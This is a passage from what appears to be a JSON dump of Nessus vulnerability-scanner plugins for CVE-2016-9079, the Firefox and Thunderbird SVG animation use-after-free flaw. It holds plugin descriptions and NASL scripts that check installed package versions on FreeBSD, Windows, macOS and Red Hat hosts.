LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(95450);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2016-9079\");\n\n script_name(english:\"FreeBSD : Mozilla -- SVG Animation Remote Code Execution (18f39fb6-7400-4063-acaf-0806e92c094f)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The Mozilla Foundation reports :\n\nA use-after-free vulnerability in SVG Animation has been discovered.\nAn exploit built on this vulnerability has been discovered in the wild\ntargeting Firefox and Tor Browser users on Windows.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2016-92/\"\n );\n # https://vuxml.freebsd.org/freebsd/18f39fb6-7400-4063-acaf-0806e92c094f.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6092eead\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Firefox nsSMILTimeContainer::NotifyTimeChange() RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:firefox-esr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:libxul\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-seamonkey\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-thunderbird\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:seamonkey\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:thunderbird\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/11/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"firefox<50.0.2,1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"firefox-esr<45.5.1,1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"linux-firefox<45.5.1,2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"seamonkey<2.46\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"linux-seamonkey<2.46\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"libxul<45.5.1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"thunderbird<45.5.1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"linux-thunderbird<45.5.1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-08-19T12:39:00", "description": "The version of Mozilla Firefox installed on the remote Windows host is prior to 50.0.2. It is, therefore, affected by a use-after-free error in dom/smil/nsSMILTimeContainer.cpp when handling SVG animations. An unauthenticated, remote attacker can exploit this issue, via a specially crafted web page, to deference already freed memory, resulting in the execution of arbitrary code.", "cvss3": {}, "published": "2016-12-02T00:00:00", "type": "nessus", "title": "Mozilla Firefox < 50.0.2 nsSMILTimeContainer.cpp SVG Animation RCE", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9079"], "modified": "2019-11-13T00:00:00", "cpe": ["cpe:/a:mozilla:firefox"], "id": "MOZILLA_FIREFOX_50_0_2.NASL", "href": "https://www.tenable.com/plugins/nessus/95475", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(95475);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/11/13\");\n\n script_cve_id(\"CVE-2016-9079\");\n script_bugtraq_id(94591);\n script_xref(name:\"MFSA\", value:\"2016-92\");\n script_xref(name:\"CERT\", value:\"791496\");\n\n script_name(english:\"Mozilla Firefox < 50.0.2 nsSMILTimeContainer.cpp SVG Animation RCE\");\n script_summary(english:\"Checks the version of Firefox.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host contains a web browser that is affected by a\nremote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Mozilla Firefox installed on the remote Windows host\nis prior to 50.0.2. It is, therefore, affected by a use-after-free\nerror in dom/smil/nsSMILTimeContainer.cpp when handling SVG\nanimations. An unauthenticated, remote attacker can exploit this\nissue, via a specially crafted web page, to deference already freed\nmemory, resulting in the execution of arbitrary code.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2016-92/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Mozilla Firefox version 50.0.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-9079\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Firefox nsSMILTimeContainer::NotifyTimeChange() RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/11/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/11/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mozilla:firefox\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"mozilla_org_installed.nasl\");\n script_require_keys(\"Mozilla/Firefox/Version\");\n\n exit(0);\n}\n\ninclude(\"mozilla_version.inc\");\n\nport = get_kb_item(\"SMB/transport\");\nif (!port) port = 445;\n\ninstalls = get_kb_list(\"SMB/Mozilla/Firefox/*\");\nif (isnull(installs)) audit(AUDIT_NOT_INST, \"Firefox\");\n\nmozilla_check_version(installs:installs, product:'firefox', esr:FALSE, fix:'50.0.2', severity:SECURITY_WARNING);\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-08-19T12:39:00", "description": "The version of Mozilla Thunderbird installed on the remote macOS or Mac OS X host is prior to 45.5.1. It is, therefore, affected by a use-after-free error in dom/smil/nsSMILTimeContainer.cpp when handling SVG animations. An unauthenticated, remote attacker can exploit this issue, via a specially crafted web page, to deference already freed memory, resulting in the execution of arbitrary code.", "cvss3": {}, "published": "2016-12-02T00:00:00", "type": "nessus", "title": "Mozilla Thunderbird < 45.5.1 nsSMILTimeContainer.cpp SVG Animation RCE (macOS)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9079"], "modified": "2019-11-13T00:00:00", "cpe": ["cpe:/a:mozilla:thunderbird"], "id": "MACOSX_THUNDERBIRD_45_5_1.NASL", "href": "https://www.tenable.com/plugins/nessus/95473", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(95473);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/11/13\");\n\n script_cve_id(\"CVE-2016-9079\");\n script_bugtraq_id(94591);\n script_xref(name:\"MFSA\", value:\"2016-92\");\n script_xref(name:\"CERT\", value:\"791496\");\n\n script_name(english:\"Mozilla Thunderbird < 45.5.1 nsSMILTimeContainer.cpp SVG Animation RCE (macOS)\");\n script_summary(english:\"Checks the version of Thunderbird.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote macOS or Mac OS X host contains a mail client that is\naffected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Mozilla Thunderbird installed on the remote macOS or\nMac OS X host is prior to 45.5.1. It is, therefore, affected by a\nuse-after-free error in dom/smil/nsSMILTimeContainer.cpp when handling\nSVG animations. An unauthenticated, remote attacker can exploit this\nissue, via a specially crafted web page, to deference already freed\nmemory, resulting in the execution of arbitrary code.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2016-92/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Mozilla Thunderbird version 45.5.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-9079\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Firefox nsSMILTimeContainer::NotifyTimeChange() RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/11/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/11/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mozilla:thunderbird\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_thunderbird_installed.nasl\");\n script_require_keys(\"MacOSX/Thunderbird/Installed\");\n\n exit(0);\n}\n\ninclude(\"mozilla_version.inc\");\n\nkb_base = \"MacOSX/Thunderbird\";\nget_kb_item_or_exit(kb_base+\"/Installed\");\n\nversion = get_kb_item_or_exit(kb_base+\"/Version\", exit_code:1);\npath = get_kb_item_or_exit(kb_base+\"/Path\", exit_code:1);\n\nif (get_kb_item(kb_base + '/is_esr')) exit(0, 'The Mozilla Thunderbird install is in the ESR branch.');\n\nmozilla_check_version(product:'thunderbird', version:version, path:path, esr:FALSE, fix:'45.5.1', severity:SECURITY_WARNING);\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-08-19T12:38:53", "description": "The version of Mozilla Firefox ESR installed on the remote macOS or Mac OS X host is 45.x prior to 45.5.1. It is, therefore, affected by a use-after-free error in dom/smil/nsSMILTimeContainer.cpp when handling SVG animations. An unauthenticated, remote attacker can exploit this issue, via a specially crafted web page, to deference already freed memory, resulting in the execution of arbitrary code.", "cvss3": {}, "published": "2016-12-02T00:00:00", "type": "nessus", "title": "Mozilla Firefox ESR 45.x < 45.5.1 nsSMILTimeContainer.cpp SVG Animation RCE (macOS)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9079"], "modified": "2019-11-13T00:00:00", "cpe": ["cpe:/a:mozilla:firefox_esr"], "id": "MACOSX_FIREFOX_45_5_1_ESR.NASL", "href": "https://www.tenable.com/plugins/nessus/95471", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(95471);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/11/13\");\n\n script_cve_id(\"CVE-2016-9079\");\n script_bugtraq_id(94591);\n script_xref(name:\"MFSA\", value:\"2016-92\");\n script_xref(name:\"CERT\", value:\"791496\");\n\n script_name(english:\"Mozilla Firefox ESR 45.x < 45.5.1 nsSMILTimeContainer.cpp SVG Animation RCE (macOS)\");\n script_summary(english:\"Checks the version of Firefox.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote macOS or Mac OS X host contains a web browser that is\naffected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Mozilla Firefox ESR installed on the remote macOS or\nMac OS X host is 45.x prior to 45.5.1. It is, therefore, affected by a\nuse-after-free error in dom/smil/nsSMILTimeContainer.cpp when handling\nSVG animations. An unauthenticated, remote attacker can exploit this\nissue, via a specially crafted web page, to deference already freed\nmemory, resulting in the execution of arbitrary code.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2016-92/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Mozilla Firefox ESR version 45.5.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-9079\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Firefox nsSMILTimeContainer::NotifyTimeChange() RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/11/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/11/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mozilla:firefox_esr\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_firefox_installed.nasl\");\n script_require_keys(\"MacOSX/Firefox/Installed\");\n\n exit(0);\n}\n\ninclude(\"mozilla_version.inc\");\n\nkb_base = \"MacOSX/Firefox\";\nget_kb_item_or_exit(kb_base+\"/Installed\");\n\nversion = get_kb_item_or_exit(kb_base+\"/Version\", exit_code:1);\npath = get_kb_item_or_exit(kb_base+\"/Path\", exit_code:1);\n\nis_esr = get_kb_item(kb_base+\"/is_esr\");\nif (isnull(is_esr)) audit(AUDIT_NOT_INST, \"Mozilla Firefox ESR\");\n\nmozilla_check_version(product:'firefox', version:version, path:path, esr:TRUE, fix:'45.5.1', min:'45.0', severity:SECURITY_WARNING);\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-08-19T12:39:00", "description": "An update for firefox is now available for Red Hat Enterprise Linux 5, Red Hat Enterprise Linux 6, and Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security impact of Critical. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nMozilla Firefox is an open source web browser.\n\nThis update upgrades Firefox to version 45.5.1 ESR.\n\nSecurity Fix(es) :\n\n* A flaw was found in the processing of malformed web content. A web page containing malicious content could cause Firefox to crash or, potentially, execute arbitrary code with the privileges of the user running Firefox. (CVE-2016-9079)\n\nRed Hat would like to thank the Mozilla project for reporting this issue.", "cvss3": {}, "published": "2016-12-02T00:00:00", "type": "nessus", "title": "RHEL 5 / 6 / 7 : firefox (RHSA-2016:2843)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9079"], "modified": "2020-05-29T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:firefox", "p-cpe:/a:redhat:enterprise_linux:firefox-debuginfo", "cpe:/o:redhat:enterprise_linux:5", "cpe:/o:redhat:enterprise_linux:6", "cpe:/o:redhat:enterprise_linux:7", "cpe:/o:redhat:enterprise_linux:7.3", "cpe:/o:redhat:enterprise_linux:7.4", "cpe:/o:redhat:enterprise_linux:7.5", "cpe:/o:redhat:enterprise_linux:7.6", "cpe:/o:redhat:enterprise_linux:7.7"], "id": "REDHAT-RHSA-2016-2843.NASL", "href": "https://www.tenable.com/plugins/nessus/95465", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2016:2843. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(95465);\n script_version(\"3.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/29\");\n\n script_cve_id(\"CVE-2016-9079\");\n script_xref(name:\"RHSA\", value:\"2016:2843\");\n\n script_name(english:\"RHEL 5 / 6 / 7 : firefox (RHSA-2016:2843)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"An update for firefox is now available for Red Hat Enterprise Linux 5,\nRed Hat Enterprise Linux 6, and Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Critical. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nMozilla Firefox is an open source web browser.\n\nThis update upgrades Firefox to version 45.5.1 ESR.\n\nSecurity Fix(es) :\n\n* A flaw was found in the processing of malformed web content. A web\npage containing malicious content could cause Firefox to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning Firefox. (CVE-2016-9079)\n\nRed Hat would like to thank the Mozilla project for reporting this\nissue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2016-92/#\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2016:2843\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-9079\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected firefox and / or firefox-debuginfo packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Firefox nsSMILTimeContainer::NotifyTimeChange() RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:firefox-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/06/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/02\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(5|6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x / 6.x / 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2016:2843\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", reference:\"firefox-45.5.1-1.el5_11\", allowmaj:TRUE)) flag++;\n\n if (rpm_check(release:\"RHEL5\", reference:\"firefox-debuginfo-45.5.1-1.el5_11\", allowmaj:TRUE)) flag++;\n\n\n if (rpm_check(release:\"RHEL6\", reference:\"firefox-45.5.1-1.el6_8\", allowmaj:TRUE)) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"firefox-debuginfo-45.5.1-1.el6_8\", allowmaj:TRUE)) flag++;\n\n\n if (rpm_check(release:\"RHEL7\", reference:\"firefox-45.5.1-1.el7_3\", allowmaj:TRUE)) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"firefox-debuginfo-45.5.1-1.el7_3\", allowmaj:TRUE)) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"firefox / firefox-debuginfo\");\n }\n}\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-08-19T12:38:53", "description": "The version of Mozilla Firefox installed on the remote macOS or Mac OS X host is prior to 50.0.2. It is, therefore, affected by a use-after-free error in dom/smil/nsSMILTimeContainer.cpp when handling SVG animations. An unauthenticated, remote attacker can exploit this issue, via a specially crafted web page, to deference already freed memory, resulting in the execution of arbitrary code.", "cvss3": {}, "published": "2016-12-02T00:00:00", "type": "nessus", "title": "Mozilla Firefox < 50.0.2 nsSMILTimeContainer.cpp SVG Animation RCE (macOS)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9079"], "modified": "2019-11-13T00:00:00", "cpe": ["cpe:/a:mozilla:firefox"], "id": "MACOSX_FIREFOX_50_0_2.NASL", "href": "https://www.tenable.com/plugins/nessus/95472", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(95472);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/11/13\");\n\n script_cve_id(\"CVE-2016-9079\");\n script_bugtraq_id(94591);\n script_xref(name:\"MFSA\", value:\"2016-92\");\n script_xref(name:\"CERT\", value:\"791496\");\n\n script_name(english:\"Mozilla Firefox < 50.0.2 nsSMILTimeContainer.cpp SVG Animation RCE (macOS)\");\n script_summary(english:\"Checks the version of Firefox.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote macOS or Mac OS X host contains a web browser that is\naffected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Mozilla Firefox installed on the remote macOS or Mac\nOS X host is prior to 50.0.2. It is, therefore, affected by a\nuse-after-free error in dom/smil/nsSMILTimeContainer.cpp when handling\nSVG animations. An unauthenticated, remote attacker can 